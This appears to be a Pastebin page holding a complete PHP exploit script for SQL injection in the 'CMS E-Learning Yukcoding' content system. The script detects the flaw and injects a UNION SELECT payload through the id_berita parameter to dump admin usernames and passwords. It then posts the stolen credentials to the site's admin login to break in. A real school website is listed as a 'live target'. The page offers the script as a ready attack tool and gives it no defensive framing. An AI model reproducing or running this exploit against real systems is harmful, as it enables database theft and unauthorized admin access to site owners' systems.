Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- *
- * @author Z0NK3X ft R3VO
- * @package Exploit CMS E-Learning Yukcoding
- * Payload by R3VO
- * SQLi CMS E-Learning Yukcoding v1.0
- *
- */
- function getstr($string, $start, $end){
- $str = explode($start,$string);
- $str = explode($end,$str[1]);
- return $str[0];
- }
- function check_connection($url){
- if(!filter_var($url, FILTER_VALIDATE_URL))
- {
- return false;
- }
- //initialize curl
- $curlInit = curl_init($url);
- curl_setopt($curlInit,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curlInit,CURLOPT_HEADER,true);
- curl_setopt($curlInit,CURLOPT_NOBODY,true);
- curl_setopt($curlInit,CURLOPT_RETURNTRANSFER,true);
- //get answer
- $response = curl_exec($curlInit);
- curl_close($curlInit);
- if ($response) return true;
- return false;
- }
- function detect_sqli($url){
- if (preg_match('/You have an error in your SQL syntax; check the manual that corresponds to your/i', file_get_contents($url."'"))) {
- return true;
- }
- else{
- return false;
- }
- }
- function get_upw($url){
- return getstr(file_get_contents($url)," <li>,"," </div>");
- }
- function curl($url){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_HTTPHEADER, array(
- 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
- 'accept-encoding: gzip, deflate, br',
- 'accept-language: en-US,en;q=0.9,id;q=0.8',
- 'cache-control: max-age=0',
- 'Cookie:',
- 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36'
- ));
- $res = curl_exec($ch);
- $header = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
- $body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
- curl_close($ch);
- $cookie = getstr($header, "Set-Cookie: ",";");
- return ["header" => $header,"cookie" => $cookie];
- }function post_data($url, $param){
- $curl = curl($url);
- $c = curl_init();
- curl_setopt($c, CURLOPT_URL, $url);
- curl_setopt($c, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36");
- curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($c, CURLOPT_HTTPHEADER, array(
- 'Accept: */*',
- 'Accept-Encoding: gzip, deflate',
- 'Accept-Language: en-US,en;q=0.9,id;q=0.8',
- 'Connection: keep-alive',
- 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
- 'Cookie: '.$curl["cookie"],
- 'X-Requested-With: XMLHttpRequest'
- ));
- curl_setopt($c, CURLOPT_POSTFIELDS,$param);
- curl_setopt($c, CURLOPT_POST, 1);
- $out = curl_exec($c);
- return $out;
- }
- function exploit_sqli($url){
- $green = "\e[1;92m";
- $cyan = "\e[1;36m";
- $putih = "\e[0m";
- $blue = "\e[34m";
- $green1 = "\e[0;92m";
- $yellow = "\e[93m";
- $red = "\e[1;91m";
- if (detect_sqli($url)) {
- echo "[+] Target is ".$green1."Vulnerable!\n".$putih;
- $payload = "%27%20+UNION+ALL+SELECT+1,@@version,make_set(6,@:=0x0a,(select(1)from(tb_admin)where@:=make_set(511,@,0x3c6c693e,username,pass)),@),4,5,6--+";
- $id = getstr($url."<", "id_berita=","<");
- $exp = str_replace($id, "-".$id.$payload, $url);
- $get = file_get_contents($exp);
- if (!preg_match('/<li>,/i', $get)) {
- echo "[-] Can't Get Database, maybe not vulnerable\n";
- exit();
- }
- $dsqli = getstr($get, '<h3 align="center">','</h3>');
- echo "[+] VersionDB : ".$dsqli."\n";
- $pecah = str_replace([",<li>,",","],["\n","|"],get_upw($exp));
- $x = 1;
- echo "+--------------------------------+\n";
- foreach (explode("\n", $pecah) as $up) {
- $pch = explode("|", $up);
- echo "[+] Data User & Pass [".$x++."]\n";
- echo "+--------------------------------+\n";
- echo "[+] Username : ".$cyan.$pch[0].$putih."\n";
- echo "[+] Passowrd : ".$cyan.$pch[1].$putih."\n";
- echo "+--------------------------------+\n";
- $urp = parse_url($url);
- $adlo = $urp["scheme"]."://".$urp["host"].$urp["path"]."admin/";
- echo "[?] Trying Login\n";
- sleep(1);
- echo "[*] Posting Data to ".$adlo."inc/proses_login.php\n";
- sleep(1);
- echo "[*] Form Data : ".str_replace(" ", "","user=".$pch[0]."&pass=".$pch[1])."\n";
- sleep(1);
- if(post_data($adlo."inc/proses_login.php", str_replace(" ", "","user=".$pch[0]."&pass=".$pch[1])) == "sukses"){
- echo "[*] Getting Response\n";
- sleep(2);
- echo $green1."[+] Login Success!\n".$putih;
- }else{
- echo "[*] Getting Response\n";
- echo $red."[-] Login Failed!\n".$putih;
- }
- }
- echo "+--------------------------------+\n";
- }
- else{
- echo "[-] Target isn't ".$red."Vulnerable!\n".$putih;
- }
- }
- /**** LIVE TARGET ****/
- # http://smkadisumarmo.sch.id/e-Learning/?hal=daftar&page=berita&action=detail&id_berita=7
- echo "[!] USE PROTOCOL! [HTTP/HTTPS]\n";
- $url = readline("[*] URL TARGET : ");
- $urp = parse_url($url);
- $adlo = $urp["scheme"]."://".$urp["host"].$urp["path"]."admin/";
- echo "[+] Connecting to Target\n";
- if (check_connection($url)) {
- echo "[?] Starting Exploit\n";
- exploit_sqli($url)."\n";
- echo "[+] Admin Login\n[*] $adlo\n";
- echo "+------------[ FINISH ]----------+\n";
- }else{
- echo "[-] Couldn't Connect to Target!\n";
- echo "[?] Please to check your connection\n";
- exit();
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement